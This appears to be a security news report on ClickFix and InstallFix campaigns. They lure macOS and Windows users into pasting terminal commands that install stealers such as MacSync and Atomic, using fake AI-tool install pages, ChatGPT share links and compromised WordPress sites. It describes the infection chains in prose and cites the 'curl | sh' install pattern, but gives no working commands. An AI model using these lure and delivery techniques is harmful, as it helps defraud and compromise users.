Three different ClickFix campaigns have been found to act as a delivery vector for the deployment of a macOS information stealer called MacSync.
“Unlike traditional exploit-based attacks, this method relies entirely on user interaction – usually in the form of copying and executing commands – making it particularly effective against users who may not appreciate the implications of running unknown and obfuscated terminal commands,” Sophos researchers Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko, and Matt Wixey said.
It’s currently not known if the campaigns are the work of the same threat actor. The use of ClickFix lures to distribute the malware was also flagged by Jamf Threat Labs in December 2025. The details of the three campaigns are as follows –
- November 2025: A campaign that used the OpenAI Atlas browser as bait, delivered via sponsored search results on Google, to direct users to a fake Google Sites URL with a download button that, when clicked, displayed instructions to open the Terminal app and paste a command to it. This action downloaded a shell script, which prompts the user to enter the system password and runs MacSync with user-level permissions.
- December 2025: A malvertising campaign that leveraged sponsored links tied to searches for queries like “how to clean up your Mac” on Google to lead users to shared conversations on the legitimate OpenAI ChatGPT site to give the impression that the links were safe. The ChatGPT conversations redirected victims to malicious GitHub-themed landing pages that tricked users into running malicious commands on the Terminal app.
- February 2026: A campaign targeting Belgium, India, and parts of North and South America that distributed a new variant of MacSync delivered through ClickFix lures. The latest iteration supports dynamic AppleScript payloads and in-memory execution to evade static analysis, bypass behavioral detections, and complicate incident response.
The shell script launched after running the Terminal command is designed to contact a hard-coded server and retrieve the AppleScript infostealer payload, while simultaneously taking steps to remove evidence of data theft. The stealer is equipped to harvest a wide range of data from compromised hosts, including exfiltrating credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.
The latest findings suggest the threat actors are adapting the formula to stay one step ahead of security tools, while weaponizing the trust associated with ChatGPT conversations to convince users to run malicious commands.
The new variant observed in the most recent campaign “likely represents the malware developer adjusting to OS and software security measures to maintain effectiveness,” Sophos said. “Refinements to the typical ClickFix social engineering tactics are therefore one way in which such campaigns may continue to evolve in the future.”
In recent months, ClickFix campaigns have used legitimate platforms like Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne to host bogus instructions for installing developer tools like Anthropic’s Claude Code. The URLs are distributed via malicious search engine ads.
The instructions, as before, deceive victims into installing infostealer malware like Amatera Stealer instead. The social engineering attack has been codenamed InstallFix or GoogleFix. According to Nati Tal, head of Guardio Labs, similar infection chains lead to the deployment of Alien infostealer on Windows and Atomic Stealer on macOS.
The PowerShell command executed after pasting and running the supposed installation command for Claude Code fetches a legitimate Chrome extension package within a malicious HTML Application (HTA) file, which then launches an obfuscated .NET loader for Alien in memory, per Tal.
“While traditional ClickFix attacks need to manufacture a reason for the user to run a command: a fake CAPTCHA, a fabricated error message, a bogus system prompt — InstallFix doesn’t need any of that,” Push Security said. “The pretext is simply the user wanting to install legit software.”
According to Pillar Security, there have been at least 20 distinct malware campaigns that have targeted artificial intelligence (AI) and vibe coding tools between February and March 2026. These include code editors, AI agents, large language models (LLM) platforms, AI-powered browser extensions, AI video generators, and AI business tools. Of these, nine have been found to target both Windows and macOS, with another seven exclusively affecting macOS users.
“The reason is clear: AI/vibe coding tool users skew heavily toward macOS, and macOS users tend to have higher-value credentials (SSH keys, cloud tokens, cryptocurrency wallets),” Pillar Security researcher Eilon Cohen said.
“The ClickFix/InstallFix technique (tricking users into pasting commands into Terminal) is uniquely effective against developers because curl | sh is a legitimate installation pattern. Homebrew, Rust, nvm, and many other developer tools use this exact pattern. The malicious commands hide in plain sight.”
Needless to say, the advantage posed by ClickFix (and its variants) has led to the tactic being adopted by multiple threat actors and groups. This includes a malicious traffic distribution system (TDS) named KongTuke (aka 404 TDS, Chaya_002, LandUpdate808, and TAG-124), which uses compromised WordPress websites and fake CAPTCHA lures to deliver a Python-based trojan called ModeloRAT.
The attackers inject malicious JavaScript into legitimate WordPress websites that prompt users to run a PowerShell command responsible for initiating a multi-stage infection process to deploy the trojan.
“The group continues to use this method alongside the newer CrashFix technique, which tricks users into installing a malicious browser extension to initiate infection,” Trend Micro said. “The malware specifically checks whether a system is part of a corporate domain and identifies installed security tools before continuing, suggesting a focus on enterprise environments rather than opportunistic infections.”
That’s not all. KongTuke campaigns have also been spotted using DNS TXT records in their ClickFix script. These DNS TXT records stage a command to retrieve and run a PowerShell script.
Other ClickFix-style pastejacking attacks that have been detected in the wild are listed below –
- Using compromised websites to display lures for ClickFix pages that mimic Google’s “Aw Snap!” error or browser updates to distribute droppers, downloaders, and malicious browser extensions.
- Using ClickFix decoys served via malvertising/phishing links to direct users to malicious pages that lead to the deployment of Remcos RAT.
- Using a fake CAPTCHA verification lure on a phony website promoting a $TEMU airdrop scam to trigger the execution of a PowerShell command that runs arbitrary Python code retrieved from a server.
- Using a bogus website advertising CleanMyMac to trick users into running a malicious Terminal command to deploy a macOS stealer named SHub Stealer and backdoor cryptocurrency wallets such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live to steal the seed phrases.
- Using a fake CAPTCHA verification lure on compromised websites to run a PowerShell script that delivers an MSI dropper, which then installs the Deno JavaScript runtime to execute obfuscated code that ultimately installs CastleRAT in memory by means of a Python loader named CastleLoader.
In a report published last week, Rapid7 revealed that highly trusted WordPress websites are being compromised as part of an ongoing, widespread campaign designed to inject a ClickFix implant impersonating a Cloudflare human verification challenge. The activity has been active since December 2025.
More than 250 infected websites have been identified in at least 12 countries, including Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the U.K., and the U.S. The websites have been identified as regional news outlets and local businesses.
The end goal of these lures is to compromise the Windows systems with different stealer malware families: StealC Stealer, an improved version of Vidar Stealer, a .NET stealer dubbed Impure Stealer, and a C++ stealer referred to as VodkaStealer. The stolen data can then act as a launchpad for financial theft or follow-on attacks.
The exact method by which the WordPress sites are hacked is presently not known. However, it’s suspected to involve the exploitation of recently disclosed security flaws in WordPress plugins and themes, previously stolen admin credentials, or publicly accessible wp-admin interfaces.
To counter the threat, site administrators are advised to keep their sites up-to-date, use strong passwords for administrative access, set up two-factor authentication (2FA), and scan for suspicious administrator accounts.
“The best defense for individuals browsing the web is to stay cautious, maintain a zero-trust mindset, use reputable security software, and keep themselves up to date with the latest phishing and ClickFix tactics used by malicious actors,” Rapid7 said. “An important takeaway from this report should be that even trusted websites can be compromised and weaponized against unsuspecting visitors.”